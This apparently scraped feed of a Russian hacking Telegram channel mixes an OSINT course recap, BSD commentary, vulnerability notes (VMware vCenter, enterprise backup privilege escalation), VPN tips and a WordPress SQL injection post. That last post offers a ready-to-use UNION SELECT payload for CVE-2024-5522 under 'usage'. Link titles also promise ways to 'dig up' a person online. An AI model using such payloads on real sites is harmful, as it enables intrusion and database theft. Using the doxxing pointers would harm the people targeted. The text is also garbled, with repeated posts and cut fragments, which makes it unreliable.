Forwarded from Life-Hack - Хакер
Подведем итоги нашего бесплатного курса "OSINT для новичков". В рамках курса были изучены фундаментальные основы поиска по открытым источникам (Open-Source Intelligence) и инструменты для автоматизации этого процесса. Также были рассмотрены специальные сервисы для сбора данных, часть из которых уже достаточно известна в кругах специалистов, а часть знакома лишь единицам и стремительно набирает популярность. Этот курс поможет вам понять важность защиты данных и конфиденциальности.
Если вы что-то пропустили и желаете прочитать, то вот список пройденых материалов:
Первая серия материалов - "Введение в OSINT":
• Введение в OSINT
• Стороны, заинтересованные в OSINT информации
• Типы сбора информации
• Преимущества и проблемы OSINT
• Правовые и этические ограничения
• Цифровой след
• Google Dorking
Вторая серия материалов - "OSINT инструменты":
• Хакерские поисковые системы.
• OSINT на платформе Telegram.
• OSINT: theHarvester и HaveIbeenPwned.
• OSINT: Snoop, GHunt, ReconSpider.
• OSINT: Поиск по фото.
• Инструменты для OSINT в VKontakte и YouTube.
• OSINT: Отслеживание транспорта
Не забывайте делиться нашим бесплатным курсом "OSINT для новичков"!
P.S.: Подборки полезных материалов, которые мы любезно собрали специально для вас:
• OSINT подборка №1
• OSINT подборка №2
• OSINT подборка №3
P.P.S.: Ещё немного полезного по теме OSINT:
• OSINT collection.
• Remini: Инструмент размытия/повышения резкости изображения может помочь получить лучший результат обратного поиска изображений и распознавания лиц.
• Cleanup.Pictures: Один из лучших онлайн-инструментов для удаления фотообъектов, которые я когда-либо видел.
• Как «пробить» человека в Интернете: используем операторы Google и логику
• Red Team Trickery.
• История одного наследства: как я с помощью OSINT и социальной инженерии заскамил скамера.
Приватный клуб единомышленников, по всем вопросам вступления в клуб писать сюда.
#OSINT #обучениеOSINT #статья
LH | Новости | Курсы | Мемы
Если вы что-то пропустили и желаете прочитать, то вот список пройденых материалов:
Первая серия материалов - "Введение в OSINT":
• Введение в OSINT
• Стороны, заинтересованные в OSINT информации
• Типы сбора информации
• Преимущества и проблемы OSINT
• Правовые и этические ограничения
• Цифровой след
• Google Dorking
Вторая серия материалов - "OSINT инструменты":
• Хакерские поисковые системы.
• OSINT на платформе Telegram.
• OSINT: theHarvester и HaveIbeenPwned.
• OSINT: Snoop, GHunt, ReconSpider.
• OSINT: Поиск по фото.
• Инструменты для OSINT в VKontakte и YouTube.
• OSINT: Отслеживание транспорта
Не забывайте делиться нашим бесплатным курсом "OSINT для новичков"!
P.S.: Подборки полезных материалов, которые мы любезно собрали специально для вас:
• OSINT подборка №1
• OSINT подборка №2
• OSINT подборка №3
P.P.S.: Ещё немного полезного по теме OSINT:
• OSINT collection.
• Remini: Инструмент размытия/повышения резкости изображения может помочь получить лучший результат обратного поиска изображений и распознавания лиц.
• Cleanup.Pictures: Один из лучших онлайн-инструментов для удаления фотообъектов, которые я когда-либо видел.
• Как «пробить» человека в Интернете: используем операторы Google и логику
• Red Team Trickery.
• История одного наследства: как я с помощью OSINT и социальной инженерии заскамил скамера.
Приватный клуб единомышленников, по всем вопросам вступления в клуб писать сюда.
#OSINT #обучениеOSINT #статья
LH | Новости | Курсы | Мемы
👍14🔥5
FreeBSD это вам не просто OS, это круто и стильно, а те кто вам говорит что там нет docker, просто не умеет в jail\зонирование и вот это вот все.
Кто написал всем известный OpenSSH ? хакеры из OpenBSD !
Почему в BSD нет прогремевшей
*
Не для кого не секрет, что доля рынка
*
НО списывать рано.
*
Во славу систем журнал читать тут
FreeBSD #OpenBSD #NetBSD #dragonFlyBSD #тычиBSD
Кто написал всем известный OpenSSH ? хакеры из OpenBSD !
Почему в BSD нет прогремевшей
CVE-2024-6387 ? glib да, но может там стабильность любят )))*
Не для кого не секрет, что доля рынка
BSD, за последние 15 лет серьезно упала,*
НО списывать рано.
*
Во славу систем журнал читать тут
FreeBSD #OpenBSD #NetBSD #dragonFlyBSD #тычиBSD
🔥23👍7😱4
СVE-2024-37081 VMware vCenter
*
Уязвимость в неправильной конфигурацией
*
POC exploit
#vmware
*
Уязвимость в неправильной конфигурацией
/etc/sudoers, позволяет сохранять опасные переменные среды при выполнении команд sudo.*
POC exploit
#vmware
🔥9👍2
Forwarded from KnightPentest
Самый серьезный российский хакер bratva известный своими комментариями про киберпреступления(например LockBit ransomware: операция Cronos, его постили даже западные СМИ) поделился каналом про кибербезопасность который он читает с удовольствием:
https://news.1rj.ru/str/knightpentest
https://news.1rj.ru/str/knightpentest
😱14👍10🔥6
По поводу
*
Пошел проверять, 4К прекрасно гоняется без тормозов.
Я и не сразу то понял почему 👌
Ну если по офф версии на территории РФ стоит старое оборудование
которое не обновляется, а трафф вырос.
Что мешает обходиться это узкое место ?
Ответ: ничего.
Поставьте себе
И будет вам счастье.
Бонус трэк:
Подумалось, тут же наши выкатили аналог тытрубы -
youtube*
Пошел проверять, 4К прекрасно гоняется без тормозов.
Я и не сразу то понял почему 👌
Ну если по офф версии на территории РФ стоит старое оборудование
googleкоторое не обновляется, а трафф вырос.
Что мешает обходиться это узкое место ?
Ответ: ничего.
Поставьте себе
vpn (только не быдло wireguard и даже не православный openvpn, а что то современное, типа xtls). клиенты есть под любую платформу: unix/linux/windows/android/appleИ будет вам счастье.
Бонус трэк:
конспирологическая версияПодумалось, тут же наши выкатили аналог тытрубы -
"Платформа", но нас уже палкой от youtube отгонишь, вот и зарезали траффик )))👍32😱5
Exploiting Enterprise Backup Software For Privilege Escalation
*
часть первая
часть вторая
*
#LPE #interprise #research
*
часть первая
часть вторая
*
#LPE #interprise #research
👍9🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
Просыпаемся, завтракаем
*
CVE-2024-5522 WordPress HTML5 Video Player
*
usage:
*
CVE-2024-5522 WordPress HTML5 Video Player
SQLi*
usage:
GET /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -🔥39👍10😱6